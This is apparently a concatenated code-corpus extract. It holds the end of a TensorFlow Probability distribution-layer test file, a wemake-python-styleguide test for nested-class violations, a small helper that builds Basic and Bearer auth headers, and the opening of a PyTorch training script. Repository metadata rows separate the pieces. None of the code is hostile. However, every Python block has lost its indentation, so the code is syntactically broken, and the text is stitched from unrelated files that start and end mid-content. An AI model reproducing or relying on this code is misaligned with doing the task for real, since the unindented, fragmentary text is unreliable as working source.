scale_noise = 0.01
x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 1])
y = self.evaluate(tfd.OneHotCategorical(
logits=_vec_pad(
0.3142 + 1.6180 * x[..., :1] - 2.7183 * x[..., 1:] + eps),
dtype=tf.float32).sample())
d = y.shape[-1]
# Create model.
k = 2
p = tfpl.CategoricalMixtureOfOneHotCategorical.params_size(d, k)
model = tf.keras.Sequential([
tf.keras.layers.Dense(p),
tfpl.CategoricalMixtureOfOneHotCategorical(d, k),
])
# Fit.
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.5),
loss=lambda y, model: -model.log_prob(y),
metrics=[])
batch_size = 100
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=1, # Usually `n // batch_size`.
shuffle=True)
yhat = model(x)
self.assertIsInstance(yhat, tfd.MixtureSameFamily)
self.assertIsInstance(yhat.mixture_distribution, tfd.Categorical)
self.assertIsInstance(yhat.components_distribution, tfd.OneHotCategorical)
# TODO(b/120221303): For now we just check that the code executes and we get
# back a distribution instance. Better would be to change the data
# generation so the model becomes well-specified (and we can check correctly
# fitted params). However, not doing this test is not critical since all
# components are unit-tested. (Ie, what we really want here--but don't
# strictly need--is another end-to-end test.)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentLayerTest(object):
"""Base class for testing independent distribution layers.
Instances of subclasses must set:
self.layer_class: The independent distribution layer class.
self.dist_class: The underlying `tfd.Distribution` class.
self.dtype: The data type for the parameters passed to the layer.
self.use_static_shape: Whether or not test tensor inputs should have
statically-known shapes.
"""
def _distribution_to_params(self, distribution, batch_shape):
"""Given a self.layer_class instance, return a tensor of its parameters."""
raise NotImplementedError
def _build_tensor(self, ndarray, dtype=None):
# Enforce parameterized dtype and static/dynamic testing.
ndarray = np.asarray(ndarray).astype(
dtype if dtype is not None else self.dtype)
return tf.compat.v1.placeholder_with_default(
input=ndarray, shape=ndarray.shape if self.use_static_shape else None)
def _check_distribution(self, t, x, batch_shape):
self.assertIsInstance(x, tfd.Independent)
self.assertIsInstance(x.distribution, self.dist_class)
t_back = self._distribution_to_params(x.distribution, batch_shape)
[t_, t_back_] = self.evaluate([t, t_back])
self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)
def test_new(self):
batch_shape = self._build_tensor([2], dtype=np.int32)
event_shape = self._build_tensor([2, 1, 2], dtype=np.int32)
p = self.layer_class.params_size(event_shape)
low = self._build_tensor(-3.)
high = self._build_tensor(3.)
t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
x = self.layer_class.new(t, event_shape, validate_args=True)
self._check_distribution(t, x, batch_shape)
def test_layer(self):
batch_shape = self._build_tensor([5, 5], dtype=np.int32)
p = self.layer_class.params_size()
low = self._build_tensor(-3.)
high = self._build_tensor(3.)
t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
layer = self.layer_class(validate_args=True)
x = layer(t)
self._check_distribution(t, x, batch_shape)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentBernoulliTest(_IndependentLayerTest):
layer_class = tfpl.IndependentBernoulli
dist_class = tfd.Bernoulli
def _distribution_to_params(self, distribution, batch_shape):
return tf.reshape(distribution.logits,
tf.concat([batch_shape, [-1]], axis=-1))
@test_util.run_all_in_graph_and_eager_modes
class IndependentBernoulliTestDynamicShape(tf.test.TestCase,
_IndependentBernoulliTest):
dtype = np.float64
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentBernoulliTestStaticShape(tf.test.TestCase,
_IndependentBernoulliTest):
dtype = np.float32
use_static_shape = True
def test_doc_string(self):
# Load data.
n = int(1e4)
scale_tril = np.array([[1.6180, 0.],
[-2.7183, 3.1416]]).astype(np.float32)
scale_noise = 0.01
x = self.evaluate(tfd.Normal(loc=0, scale=1).sample([n, 2]))
eps = tfd.Normal(loc=0, scale=scale_noise).sample([n, 2])
y = self.evaluate(tfd.Bernoulli(
logits=tf.reshape(tf.matmul(x, scale_tril) + eps,
shape=[n, 1, 2, 1])).sample())
event_shape = y.shape[1:]
# Create model.
model = tf.keras.Sequential([
tf.keras.layers.Dense(
tfpl.IndependentBernoulli.params_size(event_shape)),
tfpl.IndependentBernoulli(event_shape),
])
# Fit.
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.5),
loss=lambda y, model: -model.log_prob(y),
metrics=[])
batch_size = 100
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=n // batch_size,
shuffle=True)
self.assertAllClose(scale_tril, model.get_weights()[0],
atol=0.15, rtol=0.15)
self.assertAllClose([0., 0.], model.get_weights()[1],
atol=0.15, rtol=0.15)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentLogisticTest(_IndependentLayerTest):
layer_class = tfpl.IndependentLogistic
dist_class = tfd.Logistic
def _distribution_to_params(self, distribution, batch_shape):
return tf.concat([
tf.reshape(distribution.loc, tf.concat([batch_shape, [-1]], axis=-1)),
tfd.softplus_inverse(tf.reshape(
distribution.scale, tf.concat([batch_shape, [-1]], axis=-1)))
], -1)
@test_util.run_all_in_graph_and_eager_modes
class IndependentLogisticTestDynamicShape(tf.test.TestCase,
_IndependentLogisticTest):
dtype = np.float32
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentLogisticTestStaticShape(tf.test.TestCase,
_IndependentLogisticTest):
dtype = np.float64
use_static_shape = True
def test_doc_string(self):
input_shape = [28, 28, 1]
encoded_shape = 2
encoder = tfk.Sequential([
tfkl.InputLayer(input_shape=input_shape, dtype=self.dtype),
tfkl.Flatten(),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.IndependentLogistic.params_size(encoded_shape)),
tfpl.IndependentLogistic(encoded_shape),
tfkl.Lambda(lambda x: x + 0.) # To force conversion to tensor.
])
# Test that we can run the model and get a sample.
x = np.random.randn(*([1] + input_shape)).astype(self.dtype)
self.assertEqual((1, 2), encoder.predict_on_batch(x).shape)
out = encoder(tf.convert_to_tensor(value=x))
self.assertEqual((1, 2), out.shape)
self.assertEqual((1, 2), self.evaluate(out).shape)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentNormalTest(_IndependentLayerTest):
layer_class = tfpl.IndependentNormal
dist_class = tfd.Normal
def _distribution_to_params(self, distribution, batch_shape):
return tf.concat([
tf.reshape(distribution.loc, tf.concat([batch_shape, [-1]], axis=-1)),
tfd.softplus_inverse(tf.reshape(
distribution.scale, tf.concat([batch_shape, [-1]], axis=-1)))
], -1)
def test_keras_sequential_with_unknown_input_size(self):
input_shape = [28, 28, 1]
encoded_shape = self._build_tensor([2], dtype=np.int32)
params_size = tfpl.IndependentNormal.params_size(encoded_shape)
def reshape(x):
return tf.reshape(
x, tf.concat([tf.shape(input=x)[:-1], [-1, params_size]], 0))
# Test a Sequential model where the input to IndependentNormal does not have
# a statically-known shape.
encoder = tfk.Sequential([
tfkl.InputLayer(input_shape=input_shape, dtype=self.dtype),
tfkl.Flatten(),
tfkl.Dense(12, activation='relu'),
tfkl.Lambda(reshape),
# When encoded_shape/params_size are placeholders, the input to the
# IndependentNormal has shape (?, ?, ?) or (1, ?, ?), depending on
# whether or not encoded_shape's shape is known.
tfpl.IndependentNormal(encoded_shape),
tfkl.Lambda(lambda x: x + 0.) # To force conversion to tensor.
])
x = np.random.randn(*([1] + input_shape)).astype(self.dtype)
self.assertEqual((1, 3, 2), encoder.predict_on_batch(x).shape)
out = encoder(tf.convert_to_tensor(value=x))
if tf.executing_eagerly():
self.assertEqual((1, 3, 2), out.shape)
elif self.use_static_shape:
self.assertEqual([1, None, None], out.shape.as_list())
self.assertEqual((1, 3, 2), self.evaluate(out).shape)
@test_util.run_all_in_graph_and_eager_modes
class IndependentNormalTestDynamicShape(tf.test.TestCase,
_IndependentNormalTest):
dtype = np.float32
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentNormalTestStaticShape(tf.test.TestCase,
_IndependentNormalTest):
dtype = np.float64
use_static_shape = True
def test_doc_string(self):
input_shape = [28, 28, 1]
encoded_shape = 2
encoder = tfk.Sequential([
tfkl.InputLayer(input_shape=input_shape, dtype=self.dtype),
tfkl.Flatten(),
tfkl.Dense(10, activation='relu'),
tfkl.Dense(tfpl.IndependentNormal.params_size(encoded_shape)),
tfpl.IndependentNormal(encoded_shape),
tfkl.Lambda(lambda x: x + 0.) # To force conversion to tensor.
])
# Test that we can run the model and get a sample.
x = np.random.randn(*([1] + input_shape)).astype(self.dtype)
self.assertEqual((1, 2), encoder.predict_on_batch(x).shape)
out = encoder(tf.convert_to_tensor(value=x))
self.assertEqual((1, 2), out.shape)
self.assertEqual((1, 2), self.evaluate(out).shape)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentPoissonTest(_IndependentLayerTest):
layer_class = tfpl.IndependentPoisson
dist_class = tfd.Poisson
def _distribution_to_params(self, distribution, batch_shape):
return tf.reshape(distribution.log_rate,
tf.concat([batch_shape, [-1]], axis=-1))
@test_util.run_all_in_graph_and_eager_modes
class IndependentPoissonTestDynamicShape(tf.test.TestCase,
_IndependentPoissonTest):
dtype = np.float32
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentPoissonTestStaticShape(tf.test.TestCase,
_IndependentPoissonTest):
dtype = np.float64
use_static_shape = True
def test_doc_string(self):
# Create example data.
n = 2000
d = 4
x = self.evaluate(tfd.Uniform(low=1., high=10.).sample([n, d], seed=42))
w = [[0.314], [0.272], [-0.162], [0.058]]
log_rate = tf.matmul(x, w) - 0.141
y = self.evaluate(tfd.Poisson(log_rate=log_rate).sample())
# Poisson regression.
model = tfk.Sequential([
tfkl.Dense(tfpl.IndependentPoisson.params_size(1)),
tfpl.IndependentPoisson(1)
])
# Fit.
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.05),
loss=lambda y, model: -model.log_prob(y),
metrics=[])
batch_size = 50
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=1, # Usually `n // batch_size`.
verbose=True,
shuffle=True)
@test_util.run_all_in_graph_and_eager_modes
class _MixtureLayerTest(object):
"""Base class for testing mixture (same-family) distribution layers.
Instances of subclasses must set:
self.layer_class: The mixture distribution layer class.
self.dist_class: The underlying component `tfd.Distribution` class.
self.dtype: The data type for the parameters passed to the layer.
self.use_static_shape: Whether or not test tensor inputs should have
statically-known shapes.
"""
def _distribution_to_params(self, distribution, batch_shape):
"""Given a self.layer_class instance, return a tensor of its parameters."""
raise NotImplementedError
def _build_tensor(self, ndarray, dtype=None):
# Enforce parameterized dtype and static/dynamic testing.
ndarray = np.asarray(ndarray).astype(
dtype if dtype is not None else self.dtype)
return tf.compat.v1.placeholder_with_default(
input=ndarray, shape=ndarray.shape if self.use_static_shape else None)
def _check_distribution(self, t, x, batch_shape):
self.assertIsInstance(x, tfd.MixtureSameFamily)
self.assertIsInstance(x.mixture_distribution, tfd.Categorical)
self.assertIsInstance(x.components_distribution, tfd.Independent)
self.assertIsInstance(x.components_distribution.distribution,
self.dist_class)
t_back = self._distribution_to_params(x, batch_shape)
[t_, t_back_] = self.evaluate([t, t_back])
self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)
def test_new(self):
n = self._build_tensor(4, dtype=np.int32)
event_shape = self._build_tensor(3, dtype=np.int32)
p = self.layer_class.params_size(n, event_shape)
batch_shape = self._build_tensor([4, 2], dtype=np.int32)
low = self._build_tensor(-3.)
high = self._build_tensor(3.)
t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
x = self.layer_class.new(t, n, event_shape, validate_args=True)
self._check_distribution(t, x, batch_shape)
def test_layer(self):
n = self._build_tensor(3, dtype=np.int32)
event_shape = self._build_tensor([4, 2], dtype=np.int32)
p = self.layer_class.params_size(n, event_shape)
batch_shape = self._build_tensor([7, 3], dtype=np.int32)
low = self._build_tensor(-3.)
high = self._build_tensor(3.)
t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
layer = self.layer_class(n, event_shape, validate_args=True)
x = layer(t)
self._check_distribution(t, x, batch_shape)
@test_util.run_all_in_graph_and_eager_modes
class _MixtureLogisticTest(_MixtureLayerTest):
layer_class = tfpl.MixtureLogistic
dist_class = tfd.Logistic
def _distribution_to_params(self, distribution, batch_shape):
"""Given a self.layer_class instance, return a tensor of its parameters."""
params_shape = tf.concat([batch_shape, [-1]], axis=0)
batch_and_n_shape = tf.concat(
[tf.shape(input=distribution.mixture_distribution.logits), [-1]],
axis=0)
cd = distribution.components_distribution.distribution
return tf.concat([
distribution.mixture_distribution.logits,
tf.reshape(tf.concat([
tf.reshape(cd.loc, batch_and_n_shape),
tf.reshape(tfd.softplus_inverse(cd.scale), batch_and_n_shape)
], axis=-1), params_shape),
], axis=-1)
def test_doc_string(self):
# Load data (graph of a cardioid).
n = 2000
t = self.evaluate(tfd.Uniform(low=-np.pi, high=np.pi).sample([n, 1]))
r = 2 * (1 - tf.cos(t))
x = tf.convert_to_tensor(value=self.evaluate(
r * tf.sin(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
y = tf.convert_to_tensor(value=self.evaluate(
r * tf.cos(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
# Model the distribution of y given x with a Mixture Density Network.
event_shape = self._build_tensor([1], dtype=np.int32)
num_components = self._build_tensor(5, dtype=np.int32)
params_size = tfpl.MixtureNormal.params_size(num_components, event_shape)
model = tfk.Sequential([
tfkl.Dense(12, activation='relu'),
# NOTE: We must hard-code 15 below, instead of using `params_size`,
# because the first argument to `tfkl.Dense` must be an integer (and
# not, e.g., a placeholder tensor).
tfkl.Dense(15, activation=None),
tfpl.MixtureLogistic(num_components, event_shape),
])
# Fit.
batch_size = 100
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.02),
loss=lambda y, model: -model.log_prob(y))
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=n // batch_size)
self.assertEqual(15, self.evaluate(tf.convert_to_tensor(value=params_size)))
@test_util.run_all_in_graph_and_eager_modes
class MixtureLogisticTestDynamicShape(tf.test.TestCase,
_MixtureLogisticTest):
dtype = np.float64
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class MixtureLogisticTestStaticShape(tf.test.TestCase,
_MixtureLogisticTest):
dtype = np.float32
use_static_shape = True
@test_util.run_all_in_graph_and_eager_modes
class _MixtureNormalTest(_MixtureLayerTest):
layer_class = tfpl.MixtureNormal
dist_class = tfd.Normal
def _distribution_to_params(self, distribution, batch_shape):
"""Given a self.layer_class instance, return a tensor of its parameters."""
params_shape = tf.concat([batch_shape, [-1]], axis=0)
batch_and_n_shape = tf.concat(
[tf.shape(input=distribution.mixture_distribution.logits), [-1]],
axis=0)
cd = distribution.components_distribution.distribution
return tf.concat([
distribution.mixture_distribution.logits,
tf.reshape(tf.concat([
tf.reshape(cd.loc, batch_and_n_shape),
tf.reshape(tfd.softplus_inverse(cd.scale), batch_and_n_shape)
], axis=-1), params_shape),
], axis=-1)
def test_doc_string(self):
# Load data (graph of a cardioid).
n = 2000
t = self.evaluate(tfd.Uniform(low=-np.pi, high=np.pi).sample([n, 1]))
r = 2 * (1 - tf.cos(t))
x = tf.convert_to_tensor(value=self.evaluate(
r * tf.sin(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
y = tf.convert_to_tensor(value=self.evaluate(
r * tf.cos(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
# Model the distribution of y given x with a Mixture Density Network.
event_shape = self._build_tensor([1], dtype=np.int32)
num_components = self._build_tensor(5, dtype=np.int32)
params_size = tfpl.MixtureNormal.params_size(num_components, event_shape)
model = tfk.Sequential([
tfkl.Dense(12, activation='relu'),
# NOTE: We must hard-code 15 below, instead of using `params_size`,
# because the first argument to `tfkl.Dense` must be an integer (and
# not, e.g., a placeholder tensor).
tfkl.Dense(15, activation=None),
tfpl.MixtureNormal(num_components, event_shape),
])
# Fit.
batch_size = 100
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.02),
loss=lambda y, model: -model.log_prob(y))
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=n // batch_size)
self.assertEqual(15, self.evaluate(tf.convert_to_tensor(value=params_size)))
@test_util.run_all_in_graph_and_eager_modes
class MixtureNormalTestDynamicShape(tf.test.TestCase,
_MixtureNormalTest):
dtype = np.float32
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class MixtureNormalTestStaticShape(tf.test.TestCase,
_MixtureNormalTest):
dtype = np.float64
use_static_shape = True
@test_util.run_all_in_graph_and_eager_modes
class _MixtureSameFamilyTest(object):
def _build_tensor(self, ndarray, dtype=None):
# Enforce parameterized dtype and static/dynamic testing.
ndarray = np.asarray(ndarray).astype(
dtype if dtype is not None else self.dtype)
return tf.compat.v1.placeholder_with_default(
input=ndarray, shape=ndarray.shape if self.use_static_shape else None)
def _check_distribution(self, t, x, batch_shape):
self.assertIsInstance(x, tfd.MixtureSameFamily)
self.assertIsInstance(x.mixture_distribution, tfd.Categorical)
self.assertIsInstance(x.components_distribution, tfd.MultivariateNormalTriL)
shape = tf.concat([batch_shape, [-1]], axis=0)
batch_and_n_shape = tf.concat(
[tf.shape(input=x.mixture_distribution.logits), [-1]], axis=0)
cd = x.components_distribution
scale_tril = tfb.ScaleTriL(diag_shift=np.array(1e-5, self.dtype))
t_back = tf.concat([
x.mixture_distribution.logits,
tf.reshape(tf.concat([
tf.reshape(cd.loc, batch_and_n_shape),
tf.reshape(
scale_tril.inverse(cd.scale.to_dense()),
batch_and_n_shape),
], axis=-1), shape),
], axis=-1)
[t_, t_back_] = self.evaluate([t, t_back])
self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)
def test_new(self):
n = self._build_tensor(4, dtype=np.int32)
batch_shape = self._build_tensor([4, 2], dtype=np.int32)
event_size = self._build_tensor(3, dtype=np.int32)
low = self._build_tensor(-3.)
high = self._build_tensor(3.)
cps = tfpl.MultivariateNormalTriL.params_size(event_size)
p = tfpl.MixtureSameFamily.params_size(n, cps)
t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
normal = tfpl.MultivariateNormalTriL(event_size, validate_args=True)
x = tfpl.MixtureSameFamily.new(t, n, normal, validate_args=True)
self._check_distribution(t, x, batch_shape)
def test_layer(self):
n = self._build_tensor(3, dtype=np.int32)
batch_shape = self._build_tensor([7, 3], dtype=np.int32)
event_size = self._build_tensor(4, dtype=np.int32)
low = self._build_tensor(-3.)
high = self._build_tensor(3.)
cps = tfpl.MultivariateNormalTriL.params_size(event_size)
p = tfpl.MixtureSameFamily.params_size(n, cps)
normal = tfpl.MultivariateNormalTriL(event_size, validate_args=True)
layer = tfpl.MixtureSameFamily(n, normal, validate_args=True)
t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
x = layer(t)
self._check_distribution(t, x, batch_shape)
def test_doc_string(self):
# Load data (graph of a cardioid).
n = 2000
t = self.evaluate(tfd.Uniform(low=-np.pi, high=np.pi).sample([n, 1]))
r = 2 * (1 - tf.cos(t))
x = tf.convert_to_tensor(value=self.evaluate(
r * tf.sin(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
y = tf.convert_to_tensor(value=self.evaluate(
r * tf.cos(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
# Model the distribution of y given x with a Mixture Density Network.
event_shape = self._build_tensor([1], dtype=np.int32)
num_components = self._build_tensor(5, dtype=np.int32)
params_size = tfpl.MixtureSameFamily.params_size(
num_components, tfpl.IndependentNormal.params_size(event_shape))
model = tfk.Sequential([
tfkl.Dense(12, activation='relu'),
# NOTE: We must hard-code 15 below, instead of using `params_size`,
# because the first argument to `tfkl.Dense` must be an integer (and
# not, e.g., a placeholder tensor).
tfkl.Dense(15, activation=None),
tfpl.MixtureSameFamily(num_components,
tfpl.IndependentNormal(event_shape)),
])
# Fit.
batch_size = 100
model.compile(
optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.02),
loss=lambda y, model: -model.log_prob(y))
model.fit(x, y,
batch_size=batch_size,
epochs=1,
steps_per_epoch=1) # Usually `n // batch_size`.
self.assertEqual(15, self.evaluate(tf.convert_to_tensor(value=params_size)))
@test_util.run_all_in_graph_and_eager_modes
class MixtureSameFamilyTestDynamicShape(tf.test.TestCase,
_MixtureSameFamilyTest):
dtype = np.float32
use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class MixtureSameFamilyTestStaticShape(tf.test.TestCase,
_MixtureSameFamilyTest):
dtype = np.float64
use_static_shape = True
if __name__ == '__main__':
tf.test.main()
| 37.45 | 95 | 0.664254 |
601b8d28512481cb6825f5d1bfd2db3bcb628130 | 5,091 | py | Python | tests/test_visitors/test_ast/test_complexity/test_nested/test_nested_classes.py | Andrka/wemake-python-styleguide | 0c55d4134ee0e236d5dd1b2b5ef1c74def0e804c | [
"MIT"
] | 1 | 2020-05-21T17:58:52.000Z | 2020-05-21T17:58:52.000Z | tests/test_visitors/test_ast/test_complexity/test_nested/test_nested_classes.py | RJ722/wemake-python-styleguide | bca3c673cf6802bb1ed53b1c547924a601c0bbc5 | [
"MIT"
] | 1 | 2020-07-20T14:46:02.000Z | 2020-07-21T17:05:35.000Z | tests/test_visitors/test_ast/test_complexity/test_nested/test_nested_classes.py | RJ722/wemake-python-styleguide | bca3c673cf6802bb1ed53b1c547924a601c0bbc5 | [
"MIT"
] | 1 | 2021-02-14T06:00:44.000Z | 2021-02-14T06:00:44.000Z | import pytest
from wemake_python_styleguide.options.defaults import NESTED_CLASSES_WHITELIST
from wemake_python_styleguide.violations.best_practices import (
NestedClassViolation,
)
from wemake_python_styleguide.visitors.ast.complexity.nested import (
NestedComplexityVisitor,
)
nested_class_in_class = """
class Parent(object):
class {0}(object): ...
"""
nested_class_in_method = """
class Parent(object):
def container(self):
class {0}(object): ...
"""
nested_class_in_function = """
def container():
class {0}(object): ...
"""
nested_class_in_if = """
def container():
if some_value:
class {0}(object): ...
"""
nested_class_in_if_else = """
def container():
if some_value:
...
else:
class {0}(object): ...
"""
nested_class_in_context_manager = """
def container():
with open() as file_obj:
class {0}(object): ...
"""
nested_class_in_for_loop = """
def container():
for some in iterable():
class {0}(object): ...
"""
nested_class_in_while_loop = """
def container():
while True:
class {0}(object): ...
"""
nested_class_in_try = """
def container():
try:
class {0}(object): ...
except:
...
"""
nested_class_in_except = """
def container():
try:
...
except:
class {0}(object): ...
"""
nested_class_in_try_else = """
def container():
try:
...
except:
...
else:
class {0}(object): ...
"""
nested_class_in_try_finally = """
def container():
try:
...
finally:
class {0}(object): ...
"""
@pytest.mark.parametrize('code', [
nested_class_in_class,
nested_class_in_method,
nested_class_in_function,
nested_class_in_if,
nested_class_in_if_else,
nested_class_in_context_manager,
nested_class_in_for_loop,
nested_class_in_while_loop,
nested_class_in_try,
nested_class_in_except,
nested_class_in_try_else,
nested_class_in_try_finally,
])
def test_nested_class(
assert_errors,
assert_error_text,
parse_ast_tree,
code,
default_options,
mode,
):
"""Testing that nested classes are restricted."""
nested_name = 'NestedClass'
tree = parse_ast_tree(mode(code.format(nested_name)))
visitor = NestedComplexityVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [NestedClassViolation])
assert_error_text(visitor, nested_name)
@pytest.mark.parametrize('whitelist_name', NESTED_CLASSES_WHITELIST)
@pytest.mark.parametrize('code', [
nested_class_in_class,
])
def test_whitelist_nested_classes(
assert_errors,
parse_ast_tree,
whitelist_name,
code,
default_options,
mode,
):
"""Testing that it is possible to nest whitelisted classes."""
tree = parse_ast_tree(mode(code.format(whitelist_name)))
visitor = NestedComplexityVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('whitelist_name', [
*NESTED_CLASSES_WHITELIST,
'NestedClass',
])
@pytest.mark.parametrize('code', [
nested_class_in_class,
])
def test_custom_whitelist_nested_classes(
assert_errors,
parse_ast_tree,
whitelist_name,
code,
options,
mode,
):
"""Testing that it is possible to nest custom whitelisted classes."""
tree = parse_ast_tree(mode(code.format(whitelist_name)))
option_values = options(
nested_classes_whitelist=[*NESTED_CLASSES_WHITELIST, 'NestedClass'],
)
visitor = NestedComplexityVisitor(option_values, tree=tree)
visitor.run()
assert_errors(visitor, [])
@pytest.mark.parametrize('whitelist_name', [
*NESTED_CLASSES_WHITELIST,
'NestedClass',
])
@pytest.mark.parametrize('code', [
nested_class_in_method,
nested_class_in_function,
nested_class_in_method,
nested_class_in_function,
nested_class_in_if,
nested_class_in_if_else,
nested_class_in_context_manager,
nested_class_in_for_loop,
nested_class_in_while_loop,
nested_class_in_try,
nested_class_in_except,
nested_class_in_try_else,
nested_class_in_try_finally,
])
def test_whitelist_nested_classes_in_functions(
assert_errors,
assert_error_text,
parse_ast_tree,
whitelist_name,
code,
default_options,
mode,
):
"""Testing that it is restricted to nest any classes in functions."""
tree = parse_ast_tree(mode(code.format(whitelist_name)))
visitor = NestedComplexityVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [NestedClassViolation])
assert_error_text(visitor, whitelist_name)
def test_ordinary_class(
assert_errors,
parse_ast_tree,
default_options,
mode,
):
"""Testing that it is possible to write basic classes."""
tree = parse_ast_tree(mode("""
class Ordinary(object):
def method(self): ...
class Second(Ordinary):
def method(self): ...
"""))
visitor = NestedComplexityVisitor(default_options, tree=tree)
visitor.run()
assert_errors(visitor, [])
| 21.849785 | 78 | 0.683559 |
780fbf02b26f81df8e5ab2643cd409568d776382 | 323 | py | Python | backend/tests/utils.py | mikhailsidorov/flask-react-jwt-auth-sample | fe2ff7ad98aa4d912d5c02c8ef4fc1fe9d54bce1 | [
"MIT"
] | null | null | null | backend/tests/utils.py | mikhailsidorov/flask-react-jwt-auth-sample | fe2ff7ad98aa4d912d5c02c8ef4fc1fe9d54bce1 | [
"MIT"
] | 1 | 2018-10-25T10:05:56.000Z | 2018-10-25T10:05:56.000Z | backend/tests/utils.py | mikhailsidorov/flask-react-jwt-auth-sample | fe2ff7ad98aa4d912d5c02c8ef4fc1fe9d54bce1 | [
"MIT"
] | null | null | null | from base64 import b64encode
def make_basic_auth_headers(username, password):
return {
'Authorization': 'Basic ' + b64encode(bytes("{0}:{1}".format(
username, password), 'ascii')).decode('ascii')}
def make_token_auth_headers(access_token):
return {'Authorization': 'Bearer ' + access_token}
| 26.916667 | 69 | 0.681115 |
e023f72a2817f963e105aa1bcb5c304d37cbcae4 | 4,718 | py | Python | train.py | zhenming33/RAN_torch | cb419145f15b4bf3036862d85e672ba795bdd410 | [
"Apache-2.0"
] | 8 | 2019-07-16T15:31:24.000Z | 2022-03-05T12:40:09.000Z | train.py | WenmuZhou/RAN_torch | cb419145f15b4bf3036862d85e672ba795bdd410 | [
"Apache-2.0"
] | 4 | 2019-07-06T07:03:31.000Z | 2022-03-12T09:55:04.000Z | train.py | WenmuZhou/RAN_torch | cb419145f15b4bf3036862d85e672ba795bdd410 | [
"Apache-2.0"
] | 7 | 2019-06-10T03:08:42.000Z | 2021-03-13T03:24:09.000Z | import os
os.environ["CUDA_VISIBLE_DEVICES"] = "3"
import torch
from torch import nn
import torch.optim as optim
from torch.nn.utils.rnn import pack_padded_sequence
from model import Model
from tensorboardX import SummaryWriter
import numpy as np
from tqdm import tqdm
from data_loader import dataset
import Levenshtein
from utils import *
from torch.utils.data import DataLoader
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train_steps = 50
train_steps_size = 1000
batch_size = 256
lr = 1e-3
image_channel = 3
alpha_c = 1.
grad_clip = 5.
valid_interval = 50
valid_steps = 1
save_interval = 1000
label_path = 'labels.txt'
vocab_path = 'radical_alphabet.txt'
dict_path = 'char2seq_dict.pkl'
word_map = open(vocab_path, encoding='utf-8').readlines()[0]
word_map = word_map + 'sep'
vocab_size = len(word_map)
save_dir = 'weights'
log_dir = 'logs/lr1e-3+batch256+edropout0.5+xvaier+data_shuff+grad_clip+lrdeacy'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
# train step
def train_step(model, criterion, optimizer,images, encoded_captions, caption_lengths):
model.train()
optimizer.zero_grad()
scores, caps_sorted, decode_lengths, alphas, sort_ind = model(images, encoded_captions, caption_lengths)
targets = caps_sorted
scores_pad, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
targets_pad, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
loss = criterion(scores_pad, targets_pad)
loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
loss.backward()
clip_gradient(model, grad_clip)
# clip_gradient(optimizer, grad_clip)
optimizer.step()
return loss
def valid_step(model, criterion, images, encoded_captions, caption_lengths):
with torch.no_grad():
model.eval()
scores, caps_sorted, decode_lengths, alphas, sort_ind = model(images, encoded_captions, caption_lengths)
targets = caps_sorted
scores_pad, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
targets_pad, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
loss = criterion(scores_pad, targets_pad)
loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
pred_index = torch.argmax(scores[0], 1).cpu().numpy()
preds = [word_map[c] for c in pred_index]
label_index = caps_sorted[0, :max(decode_lengths)].cpu().numpy()
labels = [word_map[c] for c in label_index]
preds = ''.join(preds)
labels = ''.join(labels)
return loss, alphas, preds, labels, sort_ind
if __name__ == "__main__":
# add records
writer = SummaryWriter(log_dir)
dataloader = data_gen(batch_size, dataset, label_path, vocab_path, dict_path, train_percent=0.7, num_workers=1)
model = Model(image_channel, vocab_size).to(device)
